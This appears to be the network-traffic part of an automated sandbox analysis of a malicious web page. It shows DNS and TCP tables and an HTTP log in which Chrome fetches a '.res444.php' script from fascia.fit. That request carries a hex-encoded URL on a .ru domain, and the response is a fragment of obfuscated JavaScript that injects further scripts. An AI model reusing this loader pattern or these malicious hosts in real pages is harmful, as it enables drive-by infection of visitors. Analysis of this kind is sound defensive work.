                                    Feb 19, 2025 20:42:04.529521942 CET50033443192.168.2.640.113.103.199
                                    Feb 19, 2025 20:42:04.529539108 CET4435003340.113.103.199192.168.2.6
                                    Feb 19, 2025 20:42:05.308283091 CET4435003340.113.103.199192.168.2.6
                                    Feb 19, 2025 20:42:05.308547974 CET50033443192.168.2.640.113.103.199
                                    Feb 19, 2025 20:42:05.310475111 CET50033443192.168.2.640.113.103.199
                                    Feb 19, 2025 20:42:05.310483932 CET4435003340.113.103.199192.168.2.6
                                    Feb 19, 2025 20:42:05.310734034 CET4435003340.113.103.199192.168.2.6
                                    Feb 19, 2025 20:42:05.312748909 CET50033443192.168.2.640.113.103.199
                                    Feb 19, 2025 20:42:05.312813997 CET50033443192.168.2.640.113.103.199
                                    Feb 19, 2025 20:42:05.312818050 CET4435003340.113.103.199192.168.2.6
                                    Feb 19, 2025 20:42:05.312980890 CET50033443192.168.2.640.113.103.199
                                    Feb 19, 2025 20:42:05.355329037 CET4435003340.113.103.199192.168.2.6
                                    Feb 19, 2025 20:42:05.485980988 CET4435003340.113.103.199192.168.2.6
                                    Feb 19, 2025 20:42:05.486368895 CET4435003340.113.103.199192.168.2.6
                                    Feb 19, 2025 20:42:05.486540079 CET50033443192.168.2.640.113.103.199
                                    Feb 19, 2025 20:42:05.486663103 CET50033443192.168.2.640.113.103.199
                                    Feb 19, 2025 20:42:05.486675978 CET4435003340.113.103.199192.168.2.6
                                    Feb 19, 2025 20:42:05.486690044 CET50033443192.168.2.640.113.103.199
                                    Feb 19, 2025 20:42:06.462347984 CET50034443192.168.2.6142.250.181.228
                                    Feb 19, 2025 20:42:06.462393999 CET44350034142.250.181.228192.168.2.6
                                    Feb 19, 2025 20:42:06.462488890 CET50034443192.168.2.6142.250.181.228
                                    Feb 19, 2025 20:42:06.462774992 CET50034443192.168.2.6142.250.181.228
                                    Feb 19, 2025 20:42:06.462785959 CET44350034142.250.181.228192.168.2.6
                                    Feb 19, 2025 20:42:07.104051113 CET44350034142.250.181.228192.168.2.6
                                    Feb 19, 2025 20:42:07.104585886 CET50034443192.168.2.6142.250.181.228
                                    Feb 19, 2025 20:42:07.104605913 CET44350034142.250.181.228192.168.2.6
                                    Feb 19, 2025 20:42:07.104909897 CET44350034142.250.181.228192.168.2.6
                                    Feb 19, 2025 20:42:07.105222940 CET50034443192.168.2.6142.250.181.228
                                    Feb 19, 2025 20:42:07.105278015 CET44350034142.250.181.228192.168.2.6
                                    Feb 19, 2025 20:42:07.145613909 CET50034443192.168.2.6142.250.181.228
                                    Feb 19, 2025 20:42:17.023483038 CET44350034142.250.181.228192.168.2.6
                                    Feb 19, 2025 20:42:17.023627043 CET44350034142.250.181.228192.168.2.6
                                    Feb 19, 2025 20:42:17.023732901 CET50034443192.168.2.6142.250.181.228
                                    Feb 19, 2025 20:42:18.460149050 CET50034443192.168.2.6142.250.181.228
                                    Feb 19, 2025 20:42:18.460184097 CET44350034142.250.181.228192.168.2.6
                                    Feb 19, 2025 20:43:06.521840096 CET50035443192.168.2.6142.250.181.228
                                    Feb 19, 2025 20:43:06.521887064 CET44350035142.250.181.228192.168.2.6
                                    Feb 19, 2025 20:43:06.522001982 CET50035443192.168.2.6142.250.181.228
                                    Feb 19, 2025 20:43:06.522373915 CET50035443192.168.2.6142.250.181.228
                                    Feb 19, 2025 20:43:06.522398949 CET44350035142.250.181.228192.168.2.6
                                    Feb 19, 2025 20:43:07.183118105 CET44350035142.250.181.228192.168.2.6
                                    Feb 19, 2025 20:43:07.183584929 CET50035443192.168.2.6142.250.181.228
                                    Feb 19, 2025 20:43:07.183609009 CET44350035142.250.181.228192.168.2.6
                                    Feb 19, 2025 20:43:07.184140921 CET44350035142.250.181.228192.168.2.6
                                    Feb 19, 2025 20:43:07.184438944 CET50035443192.168.2.6142.250.181.228
                                    Feb 19, 2025 20:43:07.184511900 CET44350035142.250.181.228192.168.2.6
                                    Feb 19, 2025 20:43:07.223918915 CET50035443192.168.2.6142.250.181.228
                                    TimestampSource PortDest PortSource IPDest IP
                                    Feb 19, 2025 20:40:02.178102970 CET53497601.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:02.272742033 CET6290053192.168.2.61.1.1.1
                                    Feb 19, 2025 20:40:02.273214102 CET6531853192.168.2.61.1.1.1
                                    Feb 19, 2025 20:40:02.275949001 CET53597111.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:02.284861088 CET53653181.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:02.285082102 CET53629001.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:03.361864090 CET6416353192.168.2.61.1.1.1
                                    Feb 19, 2025 20:40:03.362375021 CET5039053192.168.2.61.1.1.1
                                    Feb 19, 2025 20:40:03.368927956 CET53641631.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:03.369518042 CET53503901.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:03.410777092 CET5882853192.168.2.61.1.1.1
                                    Feb 19, 2025 20:40:03.411015034 CET5336953192.168.2.61.1.1.1
                                    Feb 19, 2025 20:40:03.415780067 CET53493321.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:03.422612906 CET53588281.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:03.423660040 CET53533691.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:04.231256008 CET5461653192.168.2.61.1.1.1
                                    Feb 19, 2025 20:40:04.231412888 CET6454353192.168.2.61.1.1.1
                                    Feb 19, 2025 20:40:04.238682985 CET53645431.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:04.238961935 CET53546161.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:04.299042940 CET5482753192.168.2.61.1.1.1
                                    Feb 19, 2025 20:40:04.299326897 CET5487153192.168.2.61.1.1.1
                                    Feb 19, 2025 20:40:04.350508928 CET53548711.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:04.356796026 CET53548271.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:06.349910021 CET6309153192.168.2.61.1.1.1
                                    Feb 19, 2025 20:40:06.350106001 CET5302153192.168.2.61.1.1.1
                                    Feb 19, 2025 20:40:06.357678890 CET53530211.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:06.358062029 CET53630911.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:06.426578999 CET6531153192.168.2.61.1.1.1
                                    Feb 19, 2025 20:40:06.426752090 CET4917153192.168.2.61.1.1.1
                                    Feb 19, 2025 20:40:06.430356026 CET5488553192.168.2.61.1.1.1
                                    Feb 19, 2025 20:40:06.430707932 CET5113253192.168.2.61.1.1.1
                                    Feb 19, 2025 20:40:06.431233883 CET6407153192.168.2.61.1.1.1
                                    Feb 19, 2025 20:40:06.431381941 CET5763253192.168.2.61.1.1.1
                                    Feb 19, 2025 20:40:06.434298992 CET53491711.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:06.435435057 CET53653111.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:06.437762976 CET53548851.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:06.438306093 CET53511321.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:06.438489914 CET53576321.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:06.438572884 CET53640711.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:06.531354904 CET53633261.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:07.324080944 CET5393553192.168.2.61.1.1.1
                                    Feb 19, 2025 20:40:07.324260950 CET5322753192.168.2.61.1.1.1
                                    Feb 19, 2025 20:40:07.331597090 CET53539351.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:07.332209110 CET53532271.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:08.069765091 CET6292053192.168.2.61.1.1.1
                                    Feb 19, 2025 20:40:08.069936037 CET6175753192.168.2.61.1.1.1
                                    Feb 19, 2025 20:40:08.077022076 CET53617571.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:08.079579115 CET53629201.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:08.142379045 CET5922253192.168.2.61.1.1.1
                                    Feb 19, 2025 20:40:08.142574072 CET6193153192.168.2.61.1.1.1
                                    Feb 19, 2025 20:40:08.163537025 CET53592221.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:08.163551092 CET53619311.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:08.788717985 CET6049653192.168.2.61.1.1.1
                                    Feb 19, 2025 20:40:08.788872004 CET6509353192.168.2.61.1.1.1
                                    Feb 19, 2025 20:40:08.796770096 CET53604961.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:08.796786070 CET53650931.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:20.497169018 CET53510611.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:23.976049900 CET5749753192.168.2.61.1.1.1
                                    Feb 19, 2025 20:40:23.976411104 CET6407853192.168.2.61.1.1.1
                                    Feb 19, 2025 20:40:24.028893948 CET53574971.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:24.262794971 CET53640781.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:25.584626913 CET5059053192.168.2.61.1.1.1
                                    Feb 19, 2025 20:40:25.584774971 CET4939453192.168.2.61.1.1.1
                                    Feb 19, 2025 20:40:25.589059114 CET53635291.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:25.594649076 CET53493941.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:25.638118029 CET53505901.1.1.1192.168.2.6
                                    Feb 19, 2025 20:40:39.216378927 CET53618251.1.1.1192.168.2.6
                                    Feb 19, 2025 20:41:01.597486973 CET53652221.1.1.1192.168.2.6
                                    Feb 19, 2025 20:41:02.045389891 CET53641451.1.1.1192.168.2.6
                                    Feb 19, 2025 20:41:31.576790094 CET53597521.1.1.1192.168.2.6
                                    Feb 19, 2025 20:42:16.249387026 CET53569621.1.1.1192.168.2.6
                                    TimestampSource IPDest IPChecksumCodeType
                                    Feb 19, 2025 20:40:24.262865067 CET192.168.2.61.1.1.1c2e2(Port unreachable)Destination Unreachable
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Feb 19, 2025 20:40:02.272742033 CET192.168.2.61.1.1.10xc81Standard query (0)fascia.fitA (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:02.273214102 CET192.168.2.61.1.1.10x8f35Standard query (0)fascia.fit65IN (0x0001)false
                                    Feb 19, 2025 20:40:03.361864090 CET192.168.2.61.1.1.10x9a27Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:03.362375021 CET192.168.2.61.1.1.10xd95bStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                    Feb 19, 2025 20:40:03.410777092 CET192.168.2.61.1.1.10xbe7fStandard query (0)fascia.fitA (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:03.411015034 CET192.168.2.61.1.1.10xc885Standard query (0)fascia.fit65IN (0x0001)false
                                    Feb 19, 2025 20:40:04.231256008 CET192.168.2.61.1.1.10x6b06Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:04.231412888 CET192.168.2.61.1.1.10xa3bbStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                    Feb 19, 2025 20:40:04.299042940 CET192.168.2.61.1.1.10x9f8fStandard query (0)i2.ictacquist.ruA (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:04.299326897 CET192.168.2.61.1.1.10x46a7Standard query (0)i2.ictacquist.ru65IN (0x0001)false
                                    Feb 19, 2025 20:40:06.349910021 CET192.168.2.61.1.1.10xb9f2Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:06.350106001 CET192.168.2.61.1.1.10x5762Standard query (0)www.google.com65IN (0x0001)false
                                    Feb 19, 2025 20:40:06.426578999 CET192.168.2.61.1.1.10xc7c4Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:06.426752090 CET192.168.2.61.1.1.10x7462Standard query (0)code.jquery.com65IN (0x0001)false
                                    Feb 19, 2025 20:40:06.430356026 CET192.168.2.61.1.1.10x16c1Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:06.430707932 CET192.168.2.61.1.1.10x9bc0Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                    Feb 19, 2025 20:40:06.431233883 CET192.168.2.61.1.1.10xc20bStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:06.431381941 CET192.168.2.61.1.1.10x960eStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                    Feb 19, 2025 20:40:07.324080944 CET192.168.2.61.1.1.10xa404Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:07.324260950 CET192.168.2.61.1.1.10x9e65Standard query (0)code.jquery.com65IN (0x0001)false
                                    Feb 19, 2025 20:40:08.069765091 CET192.168.2.61.1.1.10xa266Standard query (0)developers.cloudflare.comA (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:08.069936037 CET192.168.2.61.1.1.10x7036Standard query (0)developers.cloudflare.com65IN (0x0001)false
                                    Feb 19, 2025 20:40:08.142379045 CET192.168.2.61.1.1.10xd612Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:08.142574072 CET192.168.2.61.1.1.10x6211Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                    Feb 19, 2025 20:40:08.788717985 CET192.168.2.61.1.1.10x174cStandard query (0)developers.cloudflare.comA (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:08.788872004 CET192.168.2.61.1.1.10x70e7Standard query (0)developers.cloudflare.com65IN (0x0001)false
                                    Feb 19, 2025 20:40:23.976049900 CET192.168.2.61.1.1.10x8422Standard query (0)hjhyx.br-izeffs.ruA (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:23.976411104 CET192.168.2.61.1.1.10x8d7cStandard query (0)hjhyx.br-izeffs.ru65IN (0x0001)false
                                    Feb 19, 2025 20:40:25.584626913 CET192.168.2.61.1.1.10xea97Standard query (0)hjhyx.br-izeffs.ruA (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:25.584774971 CET192.168.2.61.1.1.10x6c3dStandard query (0)hjhyx.br-izeffs.ru65IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Feb 19, 2025 20:40:02.285082102 CET1.1.1.1192.168.2.60xc81No error (0)fascia.fit103.83.194.5A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:03.368927956 CET1.1.1.1192.168.2.60x9a27No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:03.368927956 CET1.1.1.1192.168.2.60x9a27No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:03.369518042 CET1.1.1.1192.168.2.60xd95bNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                    Feb 19, 2025 20:40:03.422612906 CET1.1.1.1192.168.2.60xbe7fNo error (0)fascia.fit103.83.194.5A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:04.238682985 CET1.1.1.1192.168.2.60xa3bbNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                    Feb 19, 2025 20:40:04.238961935 CET1.1.1.1192.168.2.60x6b06No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:04.238961935 CET1.1.1.1192.168.2.60x6b06No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:04.350508928 CET1.1.1.1192.168.2.60x46a7No error (0)i2.ictacquist.ru65IN (0x0001)false
                                    Feb 19, 2025 20:40:04.356796026 CET1.1.1.1192.168.2.60x9f8fNo error (0)i2.ictacquist.ru104.21.48.1A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:04.356796026 CET1.1.1.1192.168.2.60x9f8fNo error (0)i2.ictacquist.ru104.21.32.1A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:04.356796026 CET1.1.1.1192.168.2.60x9f8fNo error (0)i2.ictacquist.ru104.21.64.1A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:04.356796026 CET1.1.1.1192.168.2.60x9f8fNo error (0)i2.ictacquist.ru104.21.16.1A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:04.356796026 CET1.1.1.1192.168.2.60x9f8fNo error (0)i2.ictacquist.ru104.21.96.1A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:04.356796026 CET1.1.1.1192.168.2.60x9f8fNo error (0)i2.ictacquist.ru104.21.112.1A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:04.356796026 CET1.1.1.1192.168.2.60x9f8fNo error (0)i2.ictacquist.ru104.21.80.1A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:06.357678890 CET1.1.1.1192.168.2.60x5762No error (0)www.google.com65IN (0x0001)false
                                    Feb 19, 2025 20:40:06.358062029 CET1.1.1.1192.168.2.60xb9f2No error (0)www.google.com142.250.181.228A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:06.435435057 CET1.1.1.1192.168.2.60xc7c4No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:06.435435057 CET1.1.1.1192.168.2.60xc7c4No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:06.435435057 CET1.1.1.1192.168.2.60xc7c4No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:06.435435057 CET1.1.1.1192.168.2.60xc7c4No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:06.437762976 CET1.1.1.1192.168.2.60x16c1No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:06.437762976 CET1.1.1.1192.168.2.60x16c1No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:06.438306093 CET1.1.1.1192.168.2.60x9bc0No error (0)challenges.cloudflare.com65IN (0x0001)false
                                    Feb 19, 2025 20:40:06.438489914 CET1.1.1.1192.168.2.60x960eNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                    Feb 19, 2025 20:40:06.438572884 CET1.1.1.1192.168.2.60xc20bNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:06.438572884 CET1.1.1.1192.168.2.60xc20bNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:07.331597090 CET1.1.1.1192.168.2.60xa404No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:07.331597090 CET1.1.1.1192.168.2.60xa404No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:07.331597090 CET1.1.1.1192.168.2.60xa404No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:07.331597090 CET1.1.1.1192.168.2.60xa404No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:08.077022076 CET1.1.1.1192.168.2.60x7036No error (0)developers.cloudflare.com65IN (0x0001)false
                                    Feb 19, 2025 20:40:08.079579115 CET1.1.1.1192.168.2.60xa266No error (0)developers.cloudflare.com104.16.2.189A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:08.079579115 CET1.1.1.1192.168.2.60xa266No error (0)developers.cloudflare.com104.16.3.189A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:08.079579115 CET1.1.1.1192.168.2.60xa266No error (0)developers.cloudflare.com104.16.4.189A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:08.079579115 CET1.1.1.1192.168.2.60xa266No error (0)developers.cloudflare.com104.16.5.189A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:08.079579115 CET1.1.1.1192.168.2.60xa266No error (0)developers.cloudflare.com104.16.6.189A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:08.163537025 CET1.1.1.1192.168.2.60xd612No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:08.163537025 CET1.1.1.1192.168.2.60xd612No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:08.163551092 CET1.1.1.1192.168.2.60x6211No error (0)challenges.cloudflare.com65IN (0x0001)false
                                    Feb 19, 2025 20:40:08.796770096 CET1.1.1.1192.168.2.60x174cNo error (0)developers.cloudflare.com104.16.2.189A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:08.796770096 CET1.1.1.1192.168.2.60x174cNo error (0)developers.cloudflare.com104.16.4.189A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:08.796770096 CET1.1.1.1192.168.2.60x174cNo error (0)developers.cloudflare.com104.16.6.189A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:08.796770096 CET1.1.1.1192.168.2.60x174cNo error (0)developers.cloudflare.com104.16.3.189A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:08.796770096 CET1.1.1.1192.168.2.60x174cNo error (0)developers.cloudflare.com104.16.5.189A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:08.796786070 CET1.1.1.1192.168.2.60x70e7No error (0)developers.cloudflare.com65IN (0x0001)false
                                    Feb 19, 2025 20:40:24.028893948 CET1.1.1.1192.168.2.60x8422No error (0)hjhyx.br-izeffs.ru104.21.96.1A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:24.028893948 CET1.1.1.1192.168.2.60x8422No error (0)hjhyx.br-izeffs.ru104.21.32.1A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:24.028893948 CET1.1.1.1192.168.2.60x8422No error (0)hjhyx.br-izeffs.ru104.21.112.1A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:24.028893948 CET1.1.1.1192.168.2.60x8422No error (0)hjhyx.br-izeffs.ru104.21.80.1A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:24.028893948 CET1.1.1.1192.168.2.60x8422No error (0)hjhyx.br-izeffs.ru104.21.64.1A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:24.028893948 CET1.1.1.1192.168.2.60x8422No error (0)hjhyx.br-izeffs.ru104.21.16.1A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:24.028893948 CET1.1.1.1192.168.2.60x8422No error (0)hjhyx.br-izeffs.ru104.21.48.1A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:24.262794971 CET1.1.1.1192.168.2.60x8d7cNo error (0)hjhyx.br-izeffs.ru65IN (0x0001)false
                                    Feb 19, 2025 20:40:25.594649076 CET1.1.1.1192.168.2.60x6c3dNo error (0)hjhyx.br-izeffs.ru65IN (0x0001)false
                                    Feb 19, 2025 20:40:25.638118029 CET1.1.1.1192.168.2.60xea97No error (0)hjhyx.br-izeffs.ru104.21.96.1A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:25.638118029 CET1.1.1.1192.168.2.60xea97No error (0)hjhyx.br-izeffs.ru104.21.80.1A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:25.638118029 CET1.1.1.1192.168.2.60xea97No error (0)hjhyx.br-izeffs.ru104.21.16.1A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:25.638118029 CET1.1.1.1192.168.2.60xea97No error (0)hjhyx.br-izeffs.ru104.21.64.1A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:25.638118029 CET1.1.1.1192.168.2.60xea97No error (0)hjhyx.br-izeffs.ru104.21.112.1A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:25.638118029 CET1.1.1.1192.168.2.60xea97No error (0)hjhyx.br-izeffs.ru104.21.48.1A (IP address)IN (0x0001)false
                                    Feb 19, 2025 20:40:25.638118029 CET1.1.1.1192.168.2.60xea97No error (0)hjhyx.br-izeffs.ru104.21.32.1A (IP address)IN (0x0001)false
                                    • fascia.fit
                                    • cdnjs.cloudflare.com
                                    • i2.ictacquist.ru
                                    • https:
                                      • code.jquery.com
                                      • challenges.cloudflare.com
                                      • developers.cloudflare.com
                                      • hjhyx.br-izeffs.ru
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.649713103.83.194.54431880C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2025-02-19 19:40:02 UTC645OUTGET /.res444.php?2-68747470733a2f2f69322e696374616371756973742e72752f766d3978472f-NfnOSY HTTP/1.1
                                    Host: fascia.fit
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                    sec-ch-ua-platform: "Windows"
                                    Accept: */*
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: script
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2025-02-19 19:40:03 UTC196INHTTP/1.1 200 OK
                                    Date: Wed, 19 Feb 2025 19:40:03 GMT
                                    Server: Apache
                                    Access-Control-Allow-Origin: *
                                    Connection: close
                                    Transfer-Encoding: chunked
                                    Content-Type: text/javascript;charset=UTF-8
                                    2025-02-19 19:40:03 UTC1968INData Raw: 37 61 34 0d 0a 20 20 20 20 76 61 72 20 48 41 58 6f 7a 4d 78 6f 54 70 67 72 4c 67 43 71 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 48 41 58 6f 7a 4d 78 6f 54 70 67 72 4c 67 43 71 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 48 41 58 6f 7a 4d 78 6f 54 70 67 72 4c 67 43 71 29 3b 0d 0a 48 41 58 6f 7a 4d 78 6f 54 70 67 72 4c 67 43 71 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29
                                    Data Ascii: 7a4 var HAXozMxoTpgrLgCq = document.createElement("script");HAXozMxoTpgrLgCq.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(HAXozMxoTpgrLgCq);HAXozMxoTpgrLgCq.onload=function()


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1192.168.2.64970940.115.3.253443
                                    TimestampBytes transferredDirectionData
                                    2025-02-19 19:40:03 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 78 30 55 58 6d 4c 55 58 30 30 69 72 6a 70 2f 48 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 31 35 61 38 63 35 37 33 36 34 39 36 39 33 36 0d 0a 0d 0a
                                    Data Ascii: CNT 1 CON 305MS-CV: x0UXmLUX00irjp/H.1Context: 815a8c5736496936
                                    2025-02-19 19:40:03 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
